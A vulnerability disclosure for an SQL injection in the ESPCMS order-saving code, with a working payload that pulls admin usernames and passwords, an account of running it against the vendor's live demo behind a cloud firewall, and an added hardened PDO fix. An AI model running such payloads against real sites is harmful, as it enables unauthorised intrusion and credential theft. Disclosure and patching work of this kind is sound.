ESPCMS (易思) SQL injection vulnerability (bypassing Alibaba Cloud Shield to obtain a shell on the demo site)

Abstract

In /interface/order.php, $ptitle and $tsn are both user-controllable and go straight into an INSERT. A normal submission shows that accept() escapes the submitted data, but when $tsn is not an array the behaviour is different.


Vulnerability author:

路人甲

Detailed description:

/interface/order.php

$db_values = '';
$arraycount = count($did) - 1;
foreach ($did as $key => $value) {
    $value = intval($value);
    $oprice[$key] = floatval($oprice[$key]);
    $bprice[$key] = floatval($bprice[$key]);
    $countprice[$key] = floatval($countprice[$key]);
    $amount[$key] = intval($amount[$key]);
    // $tsn[$key] and $ptitle[$key] are only wrapped in quotes, never cast or validated
    if ($key == $arraycount) {
        $db_values .= "($insert_id,$value,'$tsn[$key]','$ptitle[$key]',$oprice[$key],$bprice[$key],$countprice[$key],$amount[$key],1)";
    } else {
        $db_values .= "($insert_id,$value,'$tsn[$key]','$ptitle[$key]',$oprice[$key],$bprice[$key],$countprice[$key],$amount[$key],1),";
    }
}
$db_field = 'oid,did,tsn,title,oprice,bprice,countprice,amount,inventory';
$this->db->query('INSERT INTO ' . $db_table2 . ' (' . $db_field . ') VALUES ' . $db_values);

$ptitle and $tsn are both user-controllable and are inserted directly into the INSERT statement.

Normal submission:

POST /index.php?ac=order&at=ordersave HTTP/1.1
Host: demo.ecisp.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.ecisp.cn/index.php?ac=order&at=orderpay
Cookie: /**/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 426

userid=409&productmoney=33600&discount_productmoney=33600&discountmoney=0&tokenkey=98b9b2dbbda63c317b3f9ab9c370a47b&ptitle%5B%5D=ESPCMS%E5%BC%80%E5%8F%91%E7%89%88&tsn%5B%5D=SN20140706215345387&bprice%5B%5D=16800.00&oprice%5B%5D=16800.00&did%5B%5D=30&amount%5B%5D=2&countprice%5B%5D=33600.00&osid=1&opid=1&alias=wooyun&sex=0&email=asd%40qq.com&tel=123&mobile=123&address=test&zipcode=0&sendtime=1&content=&invpayee=&invcontent=

The two fields are read in order.php with:

$ptitle = $this->fun->accept('ptitle', 'P');
$tsn = $this->fun->accept('tsn', 'P');

Let's look at accept():

function accept($k, $var = 'R', $htmlcode = true, $rehtml = false) {
    switch ($var) {
        case 'G':
            $var = &$_GET;
            break;
        case 'P':
            $var = &$_POST;
            break;
        case 'C':
            $var = &$_COOKIE;
            break;
        case 'R':
            $var = &$_GET;
            if (empty($var[$k])) {
                $var = &$_POST;
            }
            break;
    }
    // daddslashes() escapes the raw value, whether it is an array or a plain string
    $putvalue = isset($var[$k]) ? $this->daddslashes($var[$k], 0) : NULL;
    return $htmlcode ? ($rehtml ? $this->preg_htmldecode($putvalue) : $this->htmldecode($putvalue)) : $putvalue;
}

This escapes the submitted data, but when $tsn is not an array the result looks like this:

$temp = "wooyun";

$temp[0] evaluates to w

Payload construction:

Submit a single ' as the $tsn parameter; daddslashes() (ESPCMS's rewrite of addslashes) escapes it to \'

Taking $tsn[0] then gives a lone \

userid=1&productmoney=16800&discount_productmoney=16800&discountmoney=0&ptitle[]=,(SELECT CONCAT(USERNAME,0x2f,PASSWORD) FROM espcms_admin_member ),1,1,1,1,1)#&tsn='&bprice[]=16800.00&oprice[]=16800.00&did[]=30&amount[]=1&countprice[]=16800.00&osid=1&opid=1&alias=wooyun&sex=0&[email protected]&tel=10010&mobile=&address=china&zipcode=0&sendtime=1&content=&invpayee=&invcontent=

View the order:

[screenshot: order view]

The SQL statement is equivalent to:

INSERT INTO espcms_order_info (oid,did,tsn,title,oprice,bprice,countprice,amount,inventory) VALUES (10,30,'\',',(SELECT CONCAT(USERNAME,0x2f,PASSWORD) FROM espcms_admin_member ),1,1,1,1,1)#',16800,16800,16800,1,1)

The lone backslash escapes the quote that should close the tsn column, so the ptitle value is parsed as unquoted SQL and the trailing # comments out the rest of the statement.
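As an added example (not ESPCMS code), the following PHP reproduces the string-offset behaviour described above in a stand-alone function and sets a hardened version beside it that rejects scalar input and binds every value through PDO. The names escape_value, vulnerable_values, safe_insert, the simplified order_info table and the pdo_sqlite extension are assumptions of this example, and daddslashes() is modelled as plain addslashes().

```php
<?php
// Added example, not ESPCMS code: reproduces why a scalar $tsn defeats the
// escaping in order.php, and shows a hardened way to run the same INSERT.

// Stand-in for ESPCMS's daddslashes(): plain addslashes() on strings (assumption).
function escape_value($v) { return addslashes((string)$v); }

// Mirrors the vulnerable loop: escaping runs before indexing, so a scalar
// "'" becomes "\'" and "\'"[0] is a lone backslash that eats the next quote.
function vulnerable_values(int $oid, array $did, $tsn, $ptitle): string {
    $tsn    = is_array($tsn) ? array_map('escape_value', $tsn) : escape_value($tsn);
    $ptitle = is_array($ptitle) ? array_map('escape_value', $ptitle) : escape_value($ptitle);
    $rows = [];
    foreach ($did as $key => $value) {
        $rows[] = "($oid," . intval($value) . ",'$tsn[$key]','$ptitle[$key]',1)";
    }
    return implode(',', $rows);
}

// Hardened: require arrays of matching length, then bind every value so the
// driver quotes each field itself and string offsets can never occur.
function safe_insert(PDO $db, int $oid, array $did, $tsn, $ptitle): int {
    if (!is_array($tsn) || !is_array($ptitle)
        || count($tsn) !== count($did) || count($ptitle) !== count($did)) {
        throw new InvalidArgumentException('tsn/ptitle must be arrays matching did');
    }
    $tsn = array_values($tsn); $ptitle = array_values($ptitle);
    $stmt = $db->prepare(
        'INSERT INTO order_info (oid,did,tsn,title,inventory) VALUES (?,?,?,?,1)');
    foreach (array_values($did) as $i => $d) {
        if (!is_scalar($tsn[$i]) || !is_scalar($ptitle[$i])) {
            throw new InvalidArgumentException('tsn/title entries must be scalars');
        }
        $stmt->execute([$oid, (int)$d, (string)$tsn[$i], (string)$ptitle[$i]]);
    }
    return count($did);
}

// Constructed input shaped like the writeup's payload: a lone quote in tsn,
// quote-free SQL text in ptitle. The backslash left in tsn unbalances the quotes.
echo vulnerable_values(10, ['30'], "'", [",(SELECT 1),1)#"]), "\n";

// Same data through the hardened path (assumes the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE order_info (oid INT, did INT, tsn TEXT, title TEXT, inventory INT)');
echo safe_insert($db, 10, ['30'], ['SN1'], [",(SELECT 1),1)#"]), " row(s) inserted, title stored literally\n";
```

Calling safe_insert() with the scalar "'" as $tsn throws instead of building a query, which is the check order.php is missing.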

 

Testing on the official demo:

Because the official demo is behind Alibaba's firewall, I fetched the data in two queries:

Query 1: SELECT USERNAME FROM espcms_admin_member
Query 2: SELECT PASSWORD FROM espcms_admin_member

[screenshot: official demo test results]
